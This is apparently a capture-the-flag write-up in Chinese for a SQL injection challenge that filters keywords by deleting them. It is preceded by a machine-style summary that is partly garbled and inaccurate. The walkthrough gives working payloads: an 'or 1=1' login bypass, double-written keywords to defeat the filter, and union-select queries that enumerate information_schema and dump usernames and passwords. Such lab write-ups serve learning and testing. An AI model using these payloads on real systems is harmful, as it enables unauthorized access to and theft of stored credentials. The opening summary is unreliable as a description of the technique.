小编点评

**靶机过滤机制分析：** **1. URL 界面打开时进行严格的 URL 过滤：** - 靶机识别并阻止任何包含特殊字符、正则表达式或特定字符串的 URL。 **2. SQL 注入风险：** - 当用户输入密码时，其密码会以字符串形式提交给服务器。 - 如果服务器没有进行 proper 编码处理，用户输入的密码可能包含 SQL 注入的恶意代码。 **3. 注入点构造：** - 攻击者可以构造恶意 SQL 语句，以覆盖用户输入的密码。 - 例如，`123' or 1=1 #` 将在注入字符串中出现。 **4. 注入点检测：** - 靶机使用关键字检测功能来识别 SQL 注入的可能的关键字。 - 在此例子中，关键字是 `1=1 #`。 **5. 双写绕过：** - 攻击者利用关键字检测的漏洞，以绕过关键字检测机制。 - 例如，将 `123'` 替换为 `1=1 #`。 **6. 回显信息：** - 攻击者通过分析回显字段，例如 `1' oorrder bbyy x#`，可以确定注入点字段的长度。 - 攻击者可以尝试不同的注入点长度，直到找到一个可以执行 SQL 注入的长度。 **7. 漏洞利用：** - 通过构造恶意 SQL 语句，攻击者可以获取用户数据库的敏感信息。 - 例如，`1' uunionnion sselectelect database(),2,3#,` 将允许攻击者检索所有数据库中存储的用户名、密码和其他敏感信息。

正文

靶机打开url

界面上显示，它做了更严格的过滤。看来后台是加了什么过滤逻辑

老规矩先尝试时候有sql注入的可能，密码框输入

123'

爆出sql错误信息，说明有注入点

构造万能密码注入

123' or 1=1 #

居然爆出sql错误，

...version for the right syntax to use near '1=1 #'' at line 1

仔细看报错信息，发现我们的 or 不见了，推测后端做了关键字检测，将关键字去掉了

这里尝试进行双写绕过,来证明我们的推测

123' oorr 1=1 #

返回

Hello admin！

Your password is 'eed87ca901c286579b6b4a0583bb6861'

那么证明双写可以完成注入，此题的考点也就是双写了

后面的内容就和 LoveSql一样了

1. 排查回显字段
1' oorrder bbyy x#，令x=1逐渐增加进行尝试，当x=4时出现报错, 说明注入点字段长度为3
2. 爆库名
1' uunionnion sselectelect database(),2,3#,依次变换函数database()的位置，确定哪个位置会回显出我们所查询的信息。经尝试，第三个注入点字段会回显查询信息
3. 爆表名
1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()#
4. 爆列名
1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='表名'#
表名处替换为b4bsql或geekuser 得到三个相同的字段 'id,username,password'
5. 爆数据
1' uunionnion sselectelect 1,2,group_concat(id,username,passwoorrd) ffromrom b4bsql#

boom 得到flag flag